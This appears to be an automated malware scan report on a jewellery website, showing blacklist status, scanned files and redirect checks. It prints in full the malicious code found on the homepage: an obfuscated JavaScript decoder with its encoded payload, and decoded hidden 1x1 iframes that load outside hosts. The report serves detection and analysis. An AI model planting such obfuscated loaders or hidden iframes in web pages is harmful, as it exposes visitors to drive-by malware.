Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mygemyourjewel.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mygemyourjewel.com/ | 200 OK Content-Length: 12170 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,50,32,59,23,56,17,28,51,31,0,0,0,0,0,0,20,16,33,21,44,40,8,41,22,54,29,55,10,46,62,61,26,18,24,5,34,15,38,30,43,19,37,0,0,0,0,27,0,6,1,35,58,7,45,12,39,60,42,52,0,25,9,2,49,14,3,4,11,53,36,57,13,48,47);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("m1iy4Yg1l4Ekge7kxcwB@WRBxrg8oK7kRWFZeHEu4_gVeI7k64OhLjEZ4afubtDultiTaXiTa_DTkYz8c9MyCQqwk4ndhYWZBrM8a0Nwk80dvtgwT9qOy9W5vcnVeMmVL1iy4Yg1lzwB") Decoded script: <iframe width="1" height="1" src="http://32tsdgseg.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>" Antivirus reports:
Malicious iFrame found. The same iFrame was found in 21 websites. size: 1x1 src: http://shoughbo.com/images/start.php?id=vlnd This URL is marked by Google as suspicious <iframe width="1" height="1" src="http://shoughbo.com/images/start.php?id=vlnd"> | ||
http://mygemyourjewel.com/menuscript.js | 200 OK Content-Length: 1031 Content-Type: application/javascript | clean |
http://www.ace-counters.com/scripts/script.asp?id=19576 | 200 OK Content-Length: 183 Content-Type: text/html | clean |
http://www.ace-counters.com/test404page.js | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mygemyourjewel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 04:52:07 GMT
Accept-Ranges: bytes
ETag: "10d136fc-2f8a-49b330d52a500"
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding,User-Agent
Content-Length: 12170
Content-Type: text/html
Last-Modified: Tue, 01 Feb 2011 06:57:56 GMT
...12170 bytes of data.
GET / HTTP/1.1
Host: mygemyourjewel.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 04:52:07 GMT
Accept-Ranges: bytes
ETag: "10d136fc-2f8a-49b330d52a500"
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: Accept-Encoding,User-Agent
Content-Length: 12170
Content-Type: text/html
Last-Modified: Tue, 01 Feb 2011 06:57:56 GMT
...12170 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mygemyourjewel.com
Referer: http://www.google.com/search?q=mygemyourjewel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mygemyourjewel.com
Referer: http://www.google.com/search?q=mygemyourjewel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.